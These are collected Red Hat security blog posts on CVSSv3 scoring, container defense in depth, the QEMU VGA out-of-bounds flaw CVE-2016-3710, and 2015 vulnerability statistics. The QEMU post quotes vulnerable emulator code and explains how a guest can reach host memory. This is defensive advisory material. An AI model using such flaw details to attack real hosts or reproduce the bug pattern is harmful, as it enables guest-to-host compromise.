    local kernel null ptr -> root 8.4/CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 7.2/AV:L/AC:L/Au:N/C:C/I:C/A:C
    local kernel DoS 5.5/CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 4.9/AV:L/AC:L/Au:N/C:N/I:N/A:C
    local network kernel -> root 8.8/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 8.3/AV:A/AC:L/Au:N/C:C/I:C/A:C
    local network kernel DoS 6.5/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 6.1/AV:A/AC:L/Au:N/C:N/I:N/A:C
    local kernel infoleak 3.3CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 1.9/AV:L/AC:M/Au:N/C:P/I:N/A:N
    remote kernel -> root 9.8/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 10.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
    remote kernel DoS 7.5/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 7.8/AV:N/AC:L/Au:N/C:N/I:N/A:C
    wireshark buffer overflow 6.3/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 5.4/AV:A/AC:M/Au:N/C:P/I:P/A:P
    wireshark null ptr deref 4.3/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 2.9/AV:A/AC:M/Au:N/C:N/I:N/A:P
    root password leak C:H/I:N/A:N C:P/I:N/A:N
    SSL cert verification issues 3.7/CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N(typical, I:L) 4.3/AV:N/AC:M/Au:N/C:N/I:P/A:N (typical, I:P)
    Java deserialization RCE 7.3/CVSS:3.0/AV:N/AC:L/PR:N:UI:N/S:U/C:L/I:L/A:L 7.5/AV:N/AC:L/Au:N/C:P/I:P/A:P

    For the JBoss Middleware suite, most scoring will be unaffected as the scoring for JBoss Middleware in CVSSv2 always related to the JBoss Middleware product itself, not the overall operating system. That won’t change with the introduction of the scope metric in CVSSv3. The scope of a vulnerability's impact will be related to all things authorized by the system user running the JBoss Middleware product, not the Java Virtual Machine, or a specific application deployed to the product.

    It is important to highlight, however, that with CVSSv2 other Red Hat products were scored based on the impact to the entire product, and not individual components. This is a very obvious change in CVSSv3 that will cause scores for products like Red Hat Enterprise Linux to be higher, sometimes substantially so, than they would have been rated using CVSSv2. This will result in our scores being closer to those published by other vendors or organizations, however differences (as outlined above) are still taken into account and may cause some slight variation.

    Further information on Red Hat impact ratings and how CVSSv3 is used can be found on our Issue Severity Classification page. CVSSv3 base metrics will be available for all vulnerabilities from June 2016 onwards. These scores are found on the CVE pages (linked to from the References section of each Red Hat Security Advisory) and also from our Security Measurements page.

    So now, forewarned being forearmed, you can feel just a little bit safer crawling out from your cave to venture forth. With a clearer understanding of the risks that could occur, you can journey out into the big, wide world better prepared!

    Posted: 2016-06-21T20:16:50+00:00
  • The Answer is always the same: Layers of Security

    Authored by: Daniel Walsh

    There is a common misperception that now that containers support seccomp we no longer need SELinux to help protect our systems. WRONG. The big weakness in containers is the container possesses the ability to interact with the host kernel and the host file systems. Securing the container processes is all about shrinking the attack surface on the host OS and more specifically on the host kernel.

    seccomp does a great job of shrinking the attack surface on the kernel. The idea is to limit the number of syscalls that container processes can use. It is an awesome feature. For example, on an x86_64 bit machine, there are around 650 system calls. If the Linux Kernel has a bug in any one of these syscalls, a process could get the kernel to turn off security features and take over the system, i.e. it would break out of confinement. If your container does not run 32 bit code, you can turn on seccomp and eliminate all x86 syscalls, basically cutting the number of syscalls in half. This means that if the kernel had a bug in a 32 bit syscall that allowed the process to take over the system, this syscall would not be available to the processes in your container, and the container would not be able to break out. We also eliminate a lot of other syscalls that we do not expect processes inside of a container to call.

    But seccomp is not enough

    This still means that if a bug remains in the kernel that can be triggered in the 300 remaining syscalls, then the container process can still take the system over, and/or create havoc. Just having open/read/write/ioctl on things like files/devices etc, could allow a container process the ability to break out. And if they break out they would be able to write all over the system.

    You could continue to shrink the seccomp syscall table to such a degree that processes can not escape, but at some point it will also prevent the container processes getting any real work done.

    Defense in Depth

    As usual, any single security mechanism by itself will not fully protect your containers. You need lots of security mechanisms to control what a process can do inside and outside a container.

    • Read-Only file systems. Prevent open/write on kernel file systems. Container processes need read access to kernel file systems like /proc, /sys, /sys/fs ... But they seldom need write access.

    • Dropping privileged process capabilities. This can prevent things like setting up the network or mounting file systems, (seccomp can also block some of these, but not as comprehensively as capabilities).

    • SELinux. Prevents which file system objects like files, devices, sockets, and directories a container process can read/write/execute. Since your processes in a container will need to use open/read/write/exec syscalls, SELinux controls which file system
      objects you can interact with. I have heard a great analogy, SELinux is telling people which people they can talk to, seccomp is telling them what they can say.

    • prctl(NO__NEW__PRIVS). Prevents privilege escalation through the use of setuid applications. Running your container
      processes without privileges is always a good idea, and this keeps the processes non privileged.

    • PID Namespace. Makes it harder to see other processes on the system that are not in your container.

    • Network Namespace. Controls which networks your container processes are able to see.

    • Mount Namespace. Hides large parts of the system from the processes inside of the container.

    • User Namespace. Helps remove remaining system capabilities. It can allow you to have privileges inside of your containers namespaces, but not outside of the container.

    • kvm. If you can find some way to run containers in a kvm/virtualization wrapper, this would be a lot more secure. (ClearLinux and others are working on this).

    The more Linux security services that you can wrap around your container processes the more secure your system will be.

    Bottom Line

    It is the combination of all of these kernel services along with administrators continuing to maintain good security practices that begin to keep your container processes contained.

    Posted: 2016-05-25T13:30:00+00:00
  • CVE-2016-3710: QEMU: out-of-bounds memory access issue

    Authored by: Prasad Pandit

    Quick Emulator (aka QEMU) is an open source systems emulator. It emulates various processors and their accompanying hardware peripherals like disc, serial ports, NIC et al. A serious vulnerability of out-of-bounds r/w access through the Video Graphics Array (VGA) emulator was discovered and reported by Mr Wei Xiao and Qinghao Tang of Marvel Team at 360.cn Inc. This vulnerability is formally known as Dark Portal. In this post we'll see how Dark Portal works and its mitigation.

    VGA is a hardware component primarily responsible for drawing content on a display device. This content could be text or images at various resolutions. The VGA controller comes with its own processor (GPU) and its own RAM. Size of this RAM varies from device to device. The VGA emulator in QEMU comes with the default memory of 16 MB. The systems' CPU maps this memory, or parts of it, to supply graphical data to the GPU.

    The VGA standard has evolved and many extensions to it have been devised to support higher resolutions or new hardware. The VESA BIOS Extensions (VBE) is a software interface implemented in VGA BIOS and Boch VBE exntension is a set of registers designed to support Super VGA (SVGA) hardware. QEMU VGA emulator implements both VBE and Boch VBE extensions. It provides two ways to access its video memory:

    • Linear Frame buffer: In this, entire video RAM is accessed by the CPU like a byte addressed array in C.
    • Bank Switching: A chunk (or bank) of 64 KB of video memory is mapped into host's memory. Host CPU could slide this 64KB window, to access other parts of the video memory.

    VBE has numerous registers to hold information about memory bank's size, offset etc. parameters. These registers can be manipulated using VGA I/O port r/w functions. A register VBE_DISPI_INDEX_BANK holds the offset address in the currently used bank (or window) of the VGA memory. In order to update the display pixel, GPU must calculate its location on the screen and its offset within current memory bank.

    QEMU VGA emulator in action:

    In QEMU's VGA emulator, user could set the offset VBE_DISPI_INDEX_BANK register via vbe_ioport_write_data() routine

            void vbe_ioport_write_data() {
                ...
                case VBE_DISPI_INDEX_BANK:
                    ...
                    s->bank_offset = (val << 16);
            }
    

    The VGA read/write functions vga_mem_readb() and vga_mem_writeb() compute the pixel location using the supplied address and bank_offset values

            uint32_t vga_mem_readb/writeb(VGACommonState *s, hwaddr addr, ...) {
                ...
                switch(memory_map_mode) {
                case 1:
                    ...
                    addr += s->bank_offset;
                    break;
                 ...
                 /* standard VGA latched access */
                 s->latch = ((uint32_t *)s->vram_ptr)[addr];
            }
    

    The said out-of-bounds r/w access issue occurs because it accesses the byte(uint8_t *) addressed video memory, as double word(uint32_t *) type. This type promotion throws the given pixel location address beyond the 16 MB VGA memory.

    Impact:

    This issue affects all QEMU/KVM and Xen guests wherein VGA emulator is enabled. Depending on where the OOB access lands in host memory, it could lead to information disclosure OR crash the QEMU process resulting in DoS. It could potentially be leveraged to execute arbitrary code with privileges of the QEMU process on the host.

    Mitigation:

    The sVirt and Seccomp functionalities used to restrict host's QEMU process privileges and resource access might mitigate the impact of successful exploitation of this issue. Also a possible policy-based workaround is to avoid granting untrusted users administrator privileges within guests.

    Conclusion:

    VGA VBE registers can be manipulated by a privileged user inside guest. It leads to an out-of-bounds memory access in QEMU process on the host, essentially making it an attack on the virtualisation host by a guest.

    Posted: 2016-05-11T13:30:00+00:00
  • Red Hat Product Security Risk Report: 2015

    Authored by: Red Hat Product...

    This report takes a look at the state of security risk for Red Hat products for calendar year 2015. We look at key metrics, specific vulnerabilities, and the most common ways users of Red Hat products were affected by security issues.

    Our methodology is to look at how many vulnerabilities we addressed and their severity, then look at which issues were of meaningful risk, and which were exploited. All of the data used to create this report is available from public data maintained by Red Hat Product Security.

    Red Hat Product Security assigns a Common Vulnerabilities and Exposures (CVE) name to every security issue we fix. If we fix a bug that later turns out to have had a security implication we’ll go back and assign a CVE name to that issue retrospectively. Every CVE fixed has an entry in our public CVE database in the Red Hat Customer Portal as well as a public bug that has more technical detail of the issue. Therefore, for the purposes of this report we will equate vulnerabilities to CVEs.

    Note: Vulnerability counts can be used for comparing Red Hat issues within particular products or dates because we apply a consistent methodology on how we allocate names and how we score their severity. You should not use vulnerability count data (such as the number of CVEs addressed) to compare with any other product from another company, because the methodology used to assign and report on vulnerabilities varies. Even products from different vendors that are affected by the same CVE can have variance in the severity of the CVE given the unique way the product is built or integrated.

    Vulnerabilities

    Across all Red Hat products, and for all issue severities, we fixed more than 1300 vulnerabilities by releasing more than 600 security advisories in 2015. At first that may seem like a lot of vulnerabilities, but for a given user only a subset of those issues will be applicable for the products and versions of the products in use. Even then, within a product such as Red Hat Enterprise Linux, not every package is installed in a default or even likely installation.

    Red Hat rates vulnerabilities using a 4 point scale designed to be an at-a-glance guide to the amount of concern Red Hat has for each security issue. This scale is designed to align as closely as possible with similar scales from other open source groups and enterprise vendors, such as Microsoft. The severity levels are designed to help users determine which advisories mattered the most. Providing a prioritised risk assessment helps customers understand and better schedule upgrades to their systems, being able to make a more informed decision about the risk that each issue places on their unique environment.

    Since 2009, we also publish Common Vulnerability Scoring System (CVSS) scores for every vulnerability addressed to aid customers who use CVSS scoring for their internal processes. However, CVSS scores have some limitations and we do not use CVSS as a way to prioritise vulnerabilities.

    The 4 point scale rates vulnerabilities as Low, Moderate, Important, or Critical.

    Vulnerabilities rated Critical in severity can pose the most risk to an organisation. By definition, a Critical vulnerability is one that could potentially be exploited remotely and automatically by a worm. However we, like other vendors, also stretch the definition to include those flaws that affect web browsers or plug-ins where a user only needs to visit a malicious (or compromised) website in order to be exploited. These flaws actually account for the majority of the Critical issues fixed as we will show in this report. If you’re using a Red Hat product that does not have a desktop, for example, you’ll be affected by a lot less Critical issues.

    The table below gives some examples for advisory and vulnerability counts for a subset of products and product families. A given Red Hat advisory may fix multiple vulnerabilities across multiple versions of a product. Therefore, a count of vulnerabilities can be used as an estimate of the amount of effort in understanding the issues and fixes. A count of advisories can be used as an estimate of the amount of effort to understand and deploy updates.

    One product broken out in the table is Red Hat Enterprise Linux 6. During Red Hat Enterprise Linux 6 installation, the user gets a choice of installing either the default selection of packages, or making a custom selection. If the user installs a “default” “server” and does not add any additional packages or layered products, then in 2015 there were just 6 Critical and 19 Important security advisories applicable to that system (and 29 advisories that also addressed moderate/low issues).

    Where there are more advisories shown than vulnerabilities (such as for OpenStack), this is because the same vulnerability may affect multiple currently supported versions of the product, each version got it’s own security advisory.

    In 2015, for every Red Hat product there were 112 Critical Red Hat security advisories released addressing 373 Critical vulnerabilities. 82% of the Critical issues had updates available to address them the same or next day after the issue was public. 99% of Critical vulnerabilities were addressed within a week of the issue being public.

    Looking at just the subset of issues affecting base Red Hat Enterprise Linux releases, there were 46 Critical Red Hat security advisories released addressing 61 Critical vulnerabilities. 96% of the Critical issues had updates available to address them the same or next day after the issue was public.

    For Red Hat Enterprise Linux, server installations will generally be affected by far fewer Critical vulnerabilities, just because most Critical vulnerabilities occur in browsers or browser components. A great way to reduce risk when using our modular products is to make sure you install the right variant, and review the package set to remove packages you don’t need.

    Vulnerability trending

    The number of vulnerabilities addressed by Red Hat year on year is increasing as a function of new products and versions of products being continually added. However, for any given version of a product we find that the number of vulnerabilities being fixed actually decreases over time. This is influenced by Red Hat backporting security fixes.

    We use the term backporting to describe the action of taking a fix for a security flaw out of the most recent version of an upstream software package and applying that fix to an older version of the package we distribute. Backporting is common among vendors like Red Hat and is essential to ensuring we can deploy automated updates to customers with minimal risk.

    The trends can be investigated using our public data, and from time to time we do Risk Reports that delve into a given product and version. For example see our Red Hat Enterprise Linux 6.5 to 6.6 Risk Report.

    What issues really mattered in 2015

    In 2014, the OpenSSL Heartbleed vulnerability started a trend of branding vulnerabilities changing the way security vulnerabilities affecting open source software were being reported and perceived. Vulnerabilities are found and fixed all of the time, and just because a vulnerability gets a catchy name, fancy logo, or media attention doesn’t mean it’s of real risk to users.

    So let’s take a chronological tour through 2015 to see which issues got branded or media attention, but more importantly which issues actually mattered for Red Hat customers.

    Ghost” (January 2015) CVE-2015-0235

    A bug was found affecting certain function calls in the glibc library. A remote attacker that was able to make an application call to an affected function could execute arbitrary code. While a proof of concept exploit is available, as is a Metasploit module targeting Exim, not many applications were found to be vulnerable in a way that would have allowed remote exploitation.

    Red Hat Enterprise Linux versions were affected. This was given Critical impact, and updates were available the same day the issue was public. This issue was given enhanced coverage in the Red Hat Customer Portal, with a banner on all pages and a customer outreach email campaign.

    Freak” (March 2015) CVE-2015-0204

    A flaw was found in the cryptography library OpenSSL where clients accepted EXPORT-grade (insecure) keys even when the client had not initially asked for them. This could have been exploited using a man-in-the-middle attack, downgrading to a weak key, factorizing it, then decrypting communication between the client and the server. Like the branded OpenSSL issues from 2014 such as Poodle and CCS Injection, this issue is hard to exploit as it requires a man-in-the-middle attack. We’re therefore not aware of active exploitation of this issue.

    Red Hat Enterprise Linux versions were affected. This was given Moderate impact, and updates were available within a few weeks of the issue being public.

    ABRT (April 2015) CVE-2015-3315

    ABRT (Automatic Bug Reporting Tool) is a tool to help users detect defects in applications and create a bug report. ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could have used these flaws to potentially escalate their privileges on an affected system to root.

    This issue affected Red Hat Enterprise Linux 7. This was given Important impact, and updates were made available. Other products and versions of Red Hat Enterprise Linux were either not affected, or not vulnerable to privilege escalation. A working public exploit is available for this issue.

    JBoss Operations Network open APIs (April 2015) CVE-2015-0297

    Red Hat JBoss Operations Network is a middleware management solution that provides a single point of control to deploy, manage, and monitor JBoss Enterprise Middleware, applications, and services. The JBoss Operations Network server did not correctly restrict access to certain remote APIs which could have allowed a remote, unauthenticated attacker to execute arbitrary Java methods. We’re not aware of active exploitation of this issue.

    This issue affected versions of JBoss Operations Network. It was given Critical impact, and updates were made available within a week of the issue being public.

    Venom” (May 2015) CVE-2015-3456

    Venom was a branded flaw which affected QEMU. A privileged user of a guest virtual machine could use this flaw to crash the guest or, potentially, execute arbitrary code on the host with the privileges of the host’s QEMU process corresponding to the guest.

    A number of Red Hat products were affected and updates were released the same day as the issue was public. Red Hat products by default would block arbitrary code execution as SELinux sVirt protection confines each QEMU process. We therefore are not aware of any exploitation of this issue.

    This issue was given enhanced coverage in the Red Hat Customer Portal, with a banner on all pages and a customer outreach email campaign.

    Logjam” (May 2015) CVE-2015-4000

    TLS connections using the Diffie-Hellman key exchange protocol were found to be vulnerable to an attack in which a man-in-the-middle attacker could downgrade vulnerable TLS connections to weak cryptography which could then be broken to decrypt the connection.

    This issue affected various cryptographic libraries across several Red Hat products. It was rated Moderate impact and updates were made available.

    Like Poodle and Freak, this issue is hard to exploit as it requires a man-in-the-middle attack. We’re not aware of active exploitation of this issue.

    libuser privilege escalation (July 2015) CVE-2015-3246

    The libuser library implements an interface for manipulating and administering user and group accounts. Flaws in libuser could allow authenticated local users with shell access to escalate privileges to root.

    Red Hat Enterprise Linux 6 and 7 were affected. This issue was rated Important impact, and updates were made available the same day as issue was made public. Red Hat Enterprise Linux 5 was affected and a mitigation was published. A public exploit exists for this issue.

    BIND DoS (July 2015) CVE-2015-5477

    A flaw in the Berkeley Internet Name Domain (BIND) allowed a remote attacker to cause named (functioning as an authoritative DNS server or a DNS resolver) to exit, causing a denial of service against BIND.

    This issue affected the versions of BIND shipped with all versions of Red Hat Enterprise Linux. This issue was rated Important impact, and updates were available the same day as the issue was made public. A public exploit and a Metasploit module exist for this issue.

    Several other similar flaws in BIND leading to denial of service were found and addressed through the year, such as CVE-2015-8704, CVE-2015-8000, and CVE-2015-5722. Public exploits exist for some of these issues.

    Firefox local file stealing via PDF reader (August 2015) CVE-2015-4495

    A flaw in Mozilla Firefox could allow an attacker to access local files with the permissions of the user running Firefox. Public exploits exist for this issue, including part of Metasploit, and specifically targeting Linux systems.

    This issue affected Firefox that was shipped with versions of Red Hat Enterprise Linux. It was rated Important impact, and updates were available the following day after the issue was public.

    Firefox add-on permission warning (August 2015) CVE-2015-4498

    Mozilla Firefox normally warns a user when trying to install an add-on if initiated by a web page. A flaw allowed this dialog to be bypassed. We’re not aware that this issue has been exploited.

    This issue affected Firefox shipped with Red Hat Enterprise Linux versions. It was rated Important impact, and updates were available the same day as the issue was public.

    Java Deserialization (November 2015) CVE-2015-7501

    An issue was found in Java Object Serialization affecting the JMXInvokerServlet interface. This could lead to arbitrary code execution when deserializing Java objects from untrusted sources with the Apache commons-collections library when containing certain risky classes on the classpath.

    This issue impacted many products in the JBoss Middleware suite and updates were made available in November and the following months. Direct exploitation of this vulnerability requires some means of getting an application to accept an object containing one of the risky classes.

    Grub2 password bypass (December 2015) CVE-2015-8370

    A flaw was found in the way the grub2 handled backspace characters entered in username and password prompts. An attacker with access to the system console could use this flaw to bypass grub2 password protection.

    This issue only affected Red Hat Enterprise Linux 7. It was rated Moderate severity, and updates were made available within a week. Steps on how to exploit this issue are public.

    Various flaws in software in supplementary channels (various dates)

    Red Hat provides some packages which are not open source software in supplementary channels for users of Red Hat Enterprise Linux. This channel contains software such as Adobe Flash Player, IBM Java, Oracle Java, and Chromium browser.

    A large number of Critical flaws affected these packages. For example, for Adobe Flash Player in 2015, we issued 15 Critical advisories to address nearly 300 Critical vulnerabilities. Linux exploits exist for some of these critical vulnerabilities, 5 having Metasploit modules. As these projects release security updates, we ship appropriate updated packages to customers.

    The issues examined in this section were included because they were meaningful. This includes the issues that are of high severity and likely to be exploited (or already have a public working exploit), as well as issues that were highly visible or branded (with a name or logo or enhanced media attention), regardless of their severity. See the Venn diagram below for our opinion on the intersection.

    Lower risk issues with increased customer attention

    Another way we gauge the level of customer concern around an issue is to measure web traffic, specifically how many page views each of the vulnerability (CVE) pages gets in the Red Hat Customer Portal.

    The graph above gives an indication of customer interest in given vulnerabilities. Many of the top issues were highlighted earlier in this report. Of the rest, the top viewed issues were ones predominantly affecting Red Hat Enterprise Linux:

    • A flaw in Samba, CVE-2015-0240, where a remote attacker could potentially execute arbitrary code as root. Samba servers are likely to be internal and not exposed to the internet, limiting the attack surface. No exploits that lead to code execution are known to exist, and some analyses have shown that creation of such a working exploit is unlikely.
    • Various flaws in OpenSSL, After high profile issues such as Heartbleed and Poodle in previous years, OpenSSL issues tend to always get increased customer interest independent of the actual severity or risk:
    • Two flaws in OpenSSH, of which one, CVE-2015-5600 did not affect Red Hat products in a default configuration and was rated Low impact; CVE-2015-5352 which affected some versions of Red Hat Enterprise Linux but at Moderate impact.
    • Two flaws in the Red Hat Enterprise Linux kernel, both rated Important impact; CVE-2015-1805 that could allow a local attacker to escalate their privileges to root; CVE-2015-5364 where a remote attacker who is able to send UDP packages to a listening server could cause it to crash. We are not aware of public exploits for either issue.
    • A Moderate rated flaw in the Apache web server CVE-2015-3183 which could lead to proxy smuggling attacks. We are not aware of a public exploit for this issue.

    The open source supply chain

    Red Hat products are based on open source software. Some Red Hat products contain several thousand individual packages, each of which is based on separate, third-party, software from upstream. While Red Hat engineers play a part in many upstream components, handling and managing vulnerabilities across thousands of third-party components is non-trivial.

    Red Hat has a dedicated Product Security team who monitor issues affecting Red Hat products and work closely in relationships with upstream projects. In 2015, more than 2000 vulnerabilities were investigated that potentially affected parts of our products, leading to fixing 1363 vulnerabilities.

    Every one of those 2000+ vulnerabilities is tracked in the Red Hat Bugzilla tool and is publicly accessible. Each vulnerability has a master bug including the CVE name as an alias and a “whiteboard” field which contains a comma separated list of metadata. The metadata we publish includes the dates we found out about the issue, the severity, and the source. We also summarise this in a file containing all of the information gathered for every CVE, as well as a readable entry in the CVE database in the Red Hat Customer Portal.

    For example, for CVE-2015-0297 mentioned above:

    Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-0297

    Whiteboard: impact=critical,public=20150414,reported=20150220,
    source=customer,cvss2=7.5/AV:N/AC:L/Au:N/C:P/I:P/A:P,
    cwe=CWE-306,jon-3/Security=affected

    This example shows us the issue was reported to Red Hat Product Security by a customer on February 20, 2015, the issue became known to the public on April 14, 2015, and it affected the JBoss Operations Network 3 product. An automated comment in the Bugzilla shows an errata was released to address this on April 21, 2015 as RHSA-2015:0862.

    Issues that are not yet public still get an entry in Bugzilla, but they are initially private to Red Hat. Once an issue becomes public, the associated Bugzilla is updated and made public.

    We make use of this data to create metrics and spot trends. One interesting metric is to look at how vulnerabilities are reported to us. We can do this by looking at the whiteboard “source” data to see how we found out about all the issues we fixed in 2015. This is shown on the chart below.

    Key:

    • Internet: for issues not disclosed in advance, we monitor a number of mailing lists and security web pages of upstream projects.
    • Relationship: issues reported to us by upstream projects, generally in advance of public disclosure.
    • Red Hat: issues found by Red Hat employees.
    • Individual: issues reported to Red Hat Product Security directly by a customer or researcher.
    • Peer vendors: issues reported to us by other open source distributions, through relationships or a shared private forum.
    • CVE: if we haven’t found out about an issue any other way, we can catch it from the list of public assigned CVE names from Mitre.
    • CERT: issues reported to us from a national Computer Emergency Response Team like CERT/CC or CPNI.

    We can make some observations from this data. First, Red Hat employees find a lot of the vulnerabilities we fix. We don’t take a passive role and wait for others to find flaws for us to fix. We actively look for issues ourselves and these are found by engineering, quality assurance, as well as our security teams. 12% of the issues we fixed in the year were found by Red Hat employees. The issues we find are shared back upstream and if they are risky, under embargo to other peer vendors (generally via the ‘distros’ shared private forum). In addition to those 167 issues, Red Hat also finds and reports flaws in software that isn’t part of a current shipped product or affects other vendors’ software.

    Next, relationships matter. When you are fixing vulnerabilities in third-party software, having a relationship with the upstream community makes a big difference. Red Hat Product Security are often asked how to get notified of issues in open source software in advance, but there is no single place you can go to get notifications. If an upstream is willing to give information about flaws in advance, then you should also be willing to give value back to that notification, making it a two-way street. At Red Hat we do this by sanity checking draft advisories, checking patches, and feeding back the results from our quality testing when there is enough time. A good example of this is the OpenSSL CCS Injection flaw in 2014. Our relationship with OpenSSL gave us advance notice of the issue. We found a mistake in the advisory as well as a mistake in the patch, which otherwise would have caused OpenSSL to have to do a secondary fix after release. Only two of the dozens of companies pre-notified about those OpenSSL vulnerabilities noticed issues and fed back information to upstream.

    Finally, it’s non-trivial to replicate this yourself. If you are an organization that uses open source software that you manage yourself, then you need to ensure you are able to find out about vulnerabilities that affect those components so you can analyse and remediate. Vendors without a sizable dedicated security team have to watch what other vendors do, or rely on other vulnerability feeds such as the list of assigned CVE names from Mitre. Red Hat chooses to invest in a dedicated team handling vulnerability notifications to ensure we find out about issues that affect our products and build upstream relationships.

    Embargo and release timings

    Vulnerabilities known to Red Hat in advance of being public are known as being “under embargo”, mirroring the way journalists use the term for stories under a press embargo which are not to be made public until an agreed date and time.

    The component parts that make up Red Hat products are open source, and this means we’re in most cases not the only vendor shipping each particular part. Unlike companies shipping proprietary software, Red Hat therefore is not in sole control of the date each flaw is made public. This is actually a good thing and leads to much shorter response times between flaws being first reported to being made public. It also keeps us honest; Red Hat can’t play games to artificially reduce our “days of risk” statistics by using tactics such as holding off public disclosure of meaningful flaws for a long period, or until some regularly scheduled patch day.

    Shorter embargo periods also make flaws much less valuable to attackers; they know a flaw in open source is likely to get fixed quickly, shortening their window of opportunity to exploit it.

    For the issues found by Red Hat, we choose to only embargo the issues that really matter and even then we use embargoes sparingly. Bringing in additional security experts, who would not normally be aware due to the embargo, rather than just the original researcher and the upstream project, increases the chances of the issue being properly understood and patched the first time around. For the majority of lower severity issues, attackers have little to no interest in them. By definition, these are issues that lead to minimal consequences even if they are exploitable, so the cost of embargoes is not justified. If we do choose to embargo an issue due to the severity, we share the details with the relevant upstream developers as well as other peer vendors, working together to address the issues. We talk about this more in our blog post "The hidden costs of embargos".

    For 2015, we knew about 438 (32%) of the vulnerabilities we addressed in advance of them being public. Across all products and vulnerabilities of all severities known to us in advance, the median embargo was 13 days.

    There are many positives to releasing fixes for issues that matter quickly, but the drawback to not having a regular patch day is that you need to respond to more issues as they happen. We do help suggest embargo dates that avoid weekends and major holidays, so let’s look how well that works in practice.

    The chart above shows a heat-map for 2015 with the days and times we push most issues for Critical and Important advisories for all Red Hat products. The more advisories pushed for a given date and hour, the darker that section of the heat-map.

    The most popular times we pushed advisories can be seen as Tuesdays 11 a.m. to 2 p.m. EST and Thursdays 9 a.m. to 3 p.m. EST. Fridays are pretty light for pushes. There were no Saturday pushes. The only Sunday pushes were ones arranged to arrive first thing Monday morning (these are usually pushed during Monday in India or Europe time zones).

    Conclusion

    This report looked at the security risk to users of Red Hat products in 2015 by giving metrics around vulnerabilities, highlighting those that were the most severe, looking at threat, those that were exploited, and showing which were branded or gained media attention.

    There are other types of security risks, such as malware or ransomware, that we haven’t covered in this report. They rely on an attacker having access to a system through an intrusion or by exploiting a vulnerability.

    For the last year of vulnerabilities affecting Red Hat products the issues that matter and the issues that got branded do have an overlap, but they certainly don’t closely match. Just because an issue gets given a name, a logo, or press attention does not mean it’s of increased risk. We’ve also shown there were some vulnerabilities of increased risk that did not get branded or media attention at all.

    At Red Hat, our dedicated Product Security team analyses threats and vulnerabilities against all of our products every day, and provide relevant advice and updates through the Red Hat Customer Portal. Customers can call on this expertise to ensure that they respond quickly to address the issues that matter, while avoiding being caught up in a media whirlwind for those that don’t.

    Appendix: Common security abbreviations and terms

    Acronyms are used extensively in security standards, so here are some of the more common terms and abbreviations you’ll see used by Red Hat relating to vulnerability handling and errata. You can find more in this blog post.

    CVE:

    The Common Vulnerabilities and Exposures (CVE) project is a list of standardized names for vulnerabilities and security exposures.

    Since November 2001 Red Hat has used CVE names in security advisories to describe all vulnerabilities affecting Red Hat products. Red Hat has CVE Editorial Board membership and is a Candidate Naming Authority. We have a public CVE compatibility page and provide a CVE database in the Red Hat Customer Portal.

    CVRF:

    The goal of the Common Vulnerability Reporting Framework (CVRF) is to provide a way to share information about security updates in an XML machine-readable format.

    Since 2012, Red Hat has provided CVRF representations of Red Hat Security Advisories, and details can be found in this page.

    OVAL:

    The Open Vulnerability and Assessment Language (OVAL) project promotes open and publicly available security content, and seeks to standardize the transfer of this information across the entire spectrum of security tools and services.

    Since 2006, Red Hat has been providing machine-readable XML versions of our Red Hat Enterprise Linux security advisories as OVAL definitions. Our OVAL definitions are designed for use by automated test tools to determine the patch state of a machine.

    Red Hat provides OVAL patch definitions for security updates to Red Hat Enterprise Linux 4, 5, 6, and 7. The first OVAL-compatible version was Red Hat Enterprise Linux 3, for which OVAL patch definitions continue to be available for download. For more information read this page.

    RHSA:

    Since 1999, all Red Hat security updates are accompanied by a security advisory (RHSA). The advisories are publicly available via the Red Hat Customer Portal as well as other notification methods such as email. These are sometimes also referred to as security errata. The other advisory types are Red Hat Bugfix Advisory (RHBA) and Red Hat Enhancement Advisory (RHEA).

    CVSS:

    Common Vulnerability Scoring System (CVSS) base scores give a detailed severity rating by scoring the constant aspects of a vulnerability: Access Vector, Access Complexity, Authentication, Confidentiality, Integrity, and Availability.

    Since 2009, Red Hat provides CVSS version 2 base metrics for all vulnerabilities affecting Red Hat products. These scores are found on the CVE pages (linked to from the References section of each Red Hat Security Advisory) and also from our Security Measurements page.

    CVSS scores are not used by Red Hat to determine the priority with which flaws are fixed. It is used as a guideline to identify key metrics of a flaw, but the priority for which flaws are fixed is determined by the overall impact of the flaw using the aforementioned 4 point scale.

    CWE:

    Common Weakness Enumeration (CWE) is a dictionary or formal list of common software weaknesses. It is a common language or taxonomy for describing vulnerabilities and weaknesses; a standard measurement for software assurance tools and services’ capabilities; and a base for software vulnerability and weakness identification, mitigation, and prevention.
    The Red Hat Customer Portal is officially CWE Compatible.

    CPE:

    CPE is a structured naming scheme for information technology systems, software, and packages. For reference, we provide a dictionary mapping the CPE names we use, to Red Hat product descriptions. Some of these CPE names will be for new products that are not in the official CPE dictionary, and should therefore be treated as temporary CPE names.

    Posted: 2016-04-20T13:30:00+00:00
  • Security risks with higher level languages in middleware products

    Authored by: Pavel Polischouk

    Java-based high-level application-specific languages provide significant flexibility when using middleware products such as BRMS. This flexibility comes at a price as there are significant security concerns in their use. In this article the usage of Drools language and MVEL in JBoss BRMS is looked at to demonstrate some of these concerns. Other middleware products might be exposed to similar risks.

    Java is an extremely feature-rich portable language that is used to build a great range of software products, from desktop GUI applications to smartphone apps to dedicated UIs for hardware such as printers to a breadth of server-side products, mostly middleware. As such, Java is a general-purpose language with a rather steep learning curve and strict syntax, well suited for complex software projects but not very friendly for writing simple scripts and one-liner pieces of code.

    Several efforts emerged over time to introduce Java-based or Java-like scripting functionality, with probably the most famous one being Javascript: a language that is not based on Java but appearing similar to Java in several aspects; and it is well-suited for scripting.

